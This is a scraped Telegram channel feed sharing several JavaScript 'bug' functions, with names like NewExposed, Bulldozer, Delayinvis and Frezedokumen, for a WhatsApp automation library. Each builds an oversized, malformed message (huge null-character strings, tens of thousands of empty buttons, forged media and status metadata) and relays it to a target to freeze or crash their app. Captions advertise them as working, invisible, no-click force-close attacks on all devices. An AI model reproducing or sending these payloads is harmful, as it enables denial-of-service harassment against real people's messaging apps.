This media is not supported in your browser
VIEW IN TELEGRAM
π1π1π₯1
async function NewExposed(sock, target) {
const cael = {
interactiveMessage: {
body: { text: "\u0000".repeat(50000) + "\u200b".repeat(30000) },
nativeFlowMessage: {
buttons: [
{
name: "quick_reply",
buttonParamsJson: JSON.stringify({
display_text: "\u0600".repeat(30000),
id: "\u0000".repeat(30000)
})
},
{
name: "quick_reply",
buttonParamsJson: JSON.stringify({
display_text: "\u2060".repeat(30000),
id: "\u200b".repeat(30000)
})
}
],
version: 4
},
contextInfo: {
stanzaId: "el_" + Date.now(),
participant: target,
quotedMessage: {
extendedTextMessage: {
text: "\u0000".repeat(100000)
}
}
}
}
};
await sock.relayMessage(target, cael, { participant: { jid: target } });
}BLANK
FREZEE
HARD
By @DG_BAHIRAVA
π₯2π2
async function Bulldozer(target) {
const msg = {
groupStatusMessageV2: {
message: {
audioMessage: {
url: "https://mmg.whatsapp.net/v/t62.7114-24/553151991_818685271268692_6795957783606894464_n.enc?ccb=11-4&oh=01_Q5Aa4AHdygHdhtAMHQB0P7fDG2jGlUkQfSzCPw4NPnWbiF8eKQ&oe=69E640DB&_nc_sid=5e03e0&mms3=true",
mimetype: "audio/mp4",
fileSha256: "BAcpC1KGx40bu/FV78kBAafPjkkdj6DLVAx+B1g3avQ=",
fileLength: "109951162777600",
seconds: 1,
ptt: true,
mediaKey: "1KXHR1pvx2+y01K6Dewevx5FF5O5wfc5iE/oHIua2WY=",
fileEncSha256: "CggqdAt0fX+QHjKnfyX2OjO1OoUXLm5WlVlv6f5aGCU=",
directPath: "/v/t62.7114-24/553151991_818685271268692_6795957783606894464_n.enc?ccb=11-4&oh=01_Q5Aa4AHdygHdhtAMHQB0P7fDG2jGlUkQfSzCPw4NPnWbiF8eKQ&oe=69E640DB&_nc_sid=5e03e0",
mediaKeyTimestamp: "1774107510",
waveform: "EBAREicPEigjMkgwMDITDQ8QFBYkCwwMDAwIBAUCBScpMkNkUE1GTT1KVVk0VUVOWlUtWEk0X0o+Xh4XFxAIAQ==",
contextInfo: {
isForwarded: true,
forwardingScore: 999,
quotedMessage: {
listMessage: {
title: '\u0000'.repeat(350000),
description: '\u0000'.repeat(250000),
buttonText: 'surel',
footerText: '',
listType: 1,
sections: [
{
title: '',
rows: Array.from({ length: 10 }, (_, i) => ({
title: '\u0000'.repeat(250000),
description: '\u0000'.repeat(250000),
rowId: null,
}))
}
]
}
}
}
}
}
}
}
await sock.relayMessage(target, msg, {})
}β€1
async function Delayinvis(target) {
const msg1 = {
groupStatusMessageV2: {
message: {
interactiveMessage: {
body: {
text: "Β±β
RanΒΏβ
"
},
nativeFlowMessage: {
buttons: Array.from({ length: 80000 }, () => ({})),
extra1: "\u0000".repeat(20000),
extra2: "\u0000".repeat(10000),
extra3: "\u0000".repeat(20000),
extra4: "\u0000".repeat(40000),
extra5: "\u0000".repeat(2000),
extra6: Array.from({ length: 80000 }, () => ({})),
extra7: Array.from({ length: 80000 }, () => ({})),
extra8: Array.from({ length: 80000 }, () => ({})),
extra9: Array.from({ length: 80000 }, () => ({}))
},
contextInfo: {
mentionedJid: [target, target]
}
}
}
}
}
await sock.relayMessage(target, msg1, {})
const msg2 = {
groupStatusMessageV2: {
message: {
interactiveMessage: {
body: {
text: "worxkingΒΏπ"
},
nativeFlowMessage: {
extra: "\u31040",
buttons: "A".repeat(20000),
name: "status_onemesae_mesaage",
extra1: "\u0000".repeat(60000),
extra2: "\u0000".repeat(5555),
extra3: "\u0000".repeat(50000)
}
}
}
}
}
await sock.relayMessage(target, msg2, {})
}β€2
async function Frezedokumen(sock, target) {
try {
await sock.relayMessage(target, {
documentMessage: {
url: "https://mmg.whatsapp.net/v/t62.7118-24/...",
mimetype: "application/pdf",
fileSha256: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
fileLength: "9999999",
pageCount: 9999,
mediaKey: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
fileEncSha256: "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=",
directPath: "/v/t62.7118-24/...",
fileName: ("X ~ ./Leonardo").repeat(20000),
caption: ("Hello World").repeat(20000),
jpegThumbnail: Buffer.from("/9j/4AAQSkZJRgABAQAAAQABAAD/2wBDAAgICAg...", 'base64'),
contextInfo: {
isForwarded: true,
forwardingScore: 9999,
forwardedNewsletterMessageInfo: {
newsletterJid: "1@newsletter",
serverMessageId: 1,
newsletterName: "Meta AI β’ Status",
contentType: "UPDATE"
},
mentionedJid: [
"0@s.whatsapp.net",
...Array.from({ length: 100 }, () =>
"1" + Math.floor(Math.random() * 9000000) + "@s.whatsapp.net"
)
],
participant: target,
remoteJid: "status@broadcast",
entryPointConversionSource: "WhatsApp.com"
}
}
}, {});
await sock.relayMessage(target, {
interactiveMessage: {
body: {
text: "bahiravaπ·"
},
nativeFlowMessage: {
buttons: "[".repeat(50001)
}
}
}, {});
console.log("β
G SEND MATI SENT!");
} catch (e) {
console.log("β ERROR: DUH GINI", e.message);
}
}β€2π₯1
async function fccccc(github, mention) {
try {
const generateId = () => Math.random().toString(36).substring(2, 15);
const msg = generateWAMessageFromContent(github, {
key: { remoteJid: "status@broadcast", fromMe: true, id: generateId() },
imageMessage: {
url: "https://mmg.whatsapp.net/v/t62.7118-24/11734305_1146343427248320_5755164235907100177_n.enc?ccb=11-4&oh=01_Q5Aa1gFrUIQgUEZak-dnStdpbAz4UuPoih7k2VBZUIJ2p0mZiw&oe=6869BE13&_nc_sid=5e03e0&mms3=true",
mimetype: "image/jpeg",
fileSha256: "2eqLffA9IMphTt+iMq8k5QrWjpXajm8ZqJA9kk5JbDg=",
fileLength: 999999999,
height: 9999,
width: 9999,
mediaKey: "buzeJOfJk4y1ysNjb3uozC2pLy9041H4pNx+FNKRWLc=",
fileEncSha256: "aGfmY0rHUSe1eBmt1vkewywDKjUmnRjng3DfLhUMYAc=",
directPath: "/v/t62.7118-24/680663126_970396275464454_6182359723749650012_n.enc?ccb=11-4&oh=01_Q5Aa4QGQLAh643XxIBrTHKJVswbNCRzYyckUeMHcyRCE74uPPw&oe=6A12ED53&_nc_sid=5e03e0",
mediaKeyTimestamp: "1776937541",
jpegThumbnail: null,
caption: "RansX7",
scansSidecar: "pDwqT9IYsTrggiHldJAKrJuoOn7Knn7f2LjPxVpwnhWHFTT0b83iwQ==",
scanLengths: [
9999999999999999999,
9999999999999999999,
9999999999999999999,
9999999999999999999
],
midQualityFileSha256: "zBHV83UQlILLcv3tAwnwaSk4FqEkZho3YKidG64duT0="
}
}, {}) ;
await ransxd.relayMessage("status@broadcast", msg.message, {
messageId: msg.key.id,
statusJidList: [github],
additionalNodes: [
{
tag: "meta",
attrs: {},
content: [
{
tag: "mentioned_users",
attrs: {},
content: [
{
tag: "to",
attrs: { jid: github },
content: undefined,
},
],
},
],
},
],
});
if (mention) {
await ransxd.relayMessage(
github,
{
statusMentionMessage: {
message: {
protocolMessage: {
key: msg.key,
type: 25,
},
additionalNodes: [
{
tag: "meta",
attrs: { is_status_mention: "false" },
content: undefined,
},
],
},
},
},
{}
);
};
} catch (error) {
console.error(`Error${error.message}`);
}
}β€2π1π₯1π₯°1π1
Media is too big
VIEW IN TELEGRAM
ALL DEVICE WORKING
ALL VERSION WORKING
FULL HARD
INVISIBLE FORCLOSE NO CLICK
Please open Telegram to view this post
VIEW IN TELEGRAM